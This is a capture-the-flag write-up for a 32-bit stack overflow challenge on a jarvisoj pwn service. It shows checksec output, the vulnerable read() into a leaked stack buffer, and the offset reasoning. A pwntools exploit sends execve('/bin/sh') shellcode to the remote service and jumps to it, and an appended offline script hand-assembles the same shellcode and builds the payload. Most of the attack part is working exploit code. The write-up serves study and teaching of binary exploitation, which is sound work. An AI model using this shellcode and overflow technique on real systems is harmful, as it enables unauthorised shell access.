checksec:

Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX disabled
PIE:      No PIE (0x8048000)
RWX:      Has RWX segments

main() calls vulnerable_function(), whose decompiled body is:

ssize_t vulnerable_function()
{
  char buf; // [esp+0h] [ebp-88h]

  printf("What's this:%p?\n", &buf);
  return read(0, &buf, 0x100u);
}

Because NX is disabled (the stack is executable) and the program leaks the address of buf, the plan is: place shellcode at the start of buf, whose address we now know, pad up to the saved return address, and overwrite it with the address of buf so that when vulnerable_function returns it jumps into the shellcode. IDA declares buf as a single char, but the [ebp-88h] annotation shows it starts 0x88 bytes below the saved ebp, while read() accepts up to 0x100 bytes. The return address therefore sits at offset 0x88 + 4 = 0x8c from buf, and the whole payload (0x8c bytes of shellcode plus padding, then the 4-byte address, 0x90 bytes in total) fits within the 0x100-byte read. The other checksec results (Partial RELRO, No PIE) play no role here; the missing canary and disabled NX are what make this work.

from pwn import *

context(arch='i386', os='linux')

io = remote('pwn2.jarvisoj.com', 9877)

# execve("/bin/sh") shellcode for 32-bit Linux; it goes at the start of buf
shell = asm(shellcraft.i386.linux.sh())

# the banner is "What's this:0x........?\n"; cut out the hex address of buf
buf_addr = int(io.recvline()[12:-2], 16)

# buf is at ebp-0x88: 0x88 bytes reach the saved ebp, 4 more reach the
# return address, which we overwrite with the address of buf itself
payload = shell + b'a' * (0x88 + 0x4 - len(shell)) + p32(buf_addr)
io.sendline(payload)
io.interactive()
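The payload layout above (shellcode, padding, address of buf at offset 0x8c) can be checked offline before touching the service. The following script is an added example and is not part of the original writeup: it parses the leaked banner, derives the return-address offset from IDA's [ebp-88h] annotation, and builds the same payload as the exploit. It swaps pwntools' shellcraft for a hand-assembled 25-byte execve("/bin/sh") shellcode and uses struct.pack so it runs with the standard library only; the banner line it feeds in is a constructed sample, since the real address changes every run.

```python
import re
import struct

# Hand-assembled execve("/bin/sh", NULL, NULL) for 32-bit Linux (25 bytes),
# used instead of shellcraft so this runs offline:
#   xor eax,eax ; xor edx,edx ; push eax ; push "//sh" ; push "/bin"
#   mov ebx,esp ; push eax ; push ebx ; mov ecx,esp ; mov al,11 ; int 0x80
SHELLCODE = (
    b"\x31\xc0\x31\xd2\x50"
    b"\x68\x2f\x2f\x73\x68"
    b"\x68\x2f\x62\x69\x6e"
    b"\x89\xe3\x50\x53\x89\xe1"
    b"\xb0\x0b\xcd\x80"
)

BUF_TO_EBP = 0x88                    # from IDA's "[ebp-88h]" annotation on buf
SAVED_EBP = 4                        # 32-bit frame: saved ebp sits just below the return address
RET_OFFSET = BUF_TO_EBP + SAVED_EBP  # 0x8c: distance from buf to the return address
READ_MAX = 0x100                     # read(0, &buf, 0x100)

LEAK_RE = re.compile(rb"What's this:(0x[0-9a-fA-F]+)\?")


def parse_leak(line):
    """Extract the leaked address of buf from the program's banner line."""
    m = LEAK_RE.search(line)
    if m is None:
        raise ValueError("unexpected banner: %r" % (line,))
    return int(m.group(1), 16)


def ret_offset_from_ida(annotation):
    """Turn an IDA stack annotation such as '[esp+0h] [ebp-88h]' into the
    distance from that variable to the saved return address."""
    m = re.search(r"\[ebp-([0-9a-fA-F]+)h\]", annotation)
    if m is None:
        raise ValueError("no ebp-relative offset in %r" % (annotation,))
    return int(m.group(1), 16) + SAVED_EBP


def build_payload(buf_addr, shellcode=SHELLCODE, ret_offset=RET_OFFSET, read_max=READ_MAX):
    """Shellcode at the start of buf, padding up to the return slot, then &buf."""
    if len(shellcode) > ret_offset:
        raise ValueError("shellcode (%d bytes) does not fit before the return address"
                         % len(shellcode))
    payload = shellcode + b"a" * (ret_offset - len(shellcode)) + struct.pack("<I", buf_addr)
    # sendline() appends one more byte; everything must still fit in the 0x100-byte read
    if len(payload) + 1 > read_max:
        raise ValueError("payload too long for the %#x-byte read" % read_max)
    return payload


def describe_layout(payload, ret_offset=RET_OFFSET):
    """Return (offset of the return-address slot, value written there) for a
    built payload, so the layout can be checked without the remote service."""
    value = struct.unpack("<I", payload[ret_offset:ret_offset + 4])[0]
    return ret_offset, value


if __name__ == "__main__":
    # constructed sample of the banner the binary prints; the real address varies per run
    banner = b"What's this:0xffffd5d0?\n"
    addr = parse_leak(banner)
    payload = build_payload(addr)
    slot, target = describe_layout(payload)
    print("buf @ %#x, payload %d bytes, return slot at %#x -> %#x"
          % (addr, len(payload), slot, target))
```

The `ret_offset_from_ida` helper is the one step people usually get wrong by hand: the IDA offset is the distance to the saved ebp, and the return address is 4 bytes above that on a 32-bit frame.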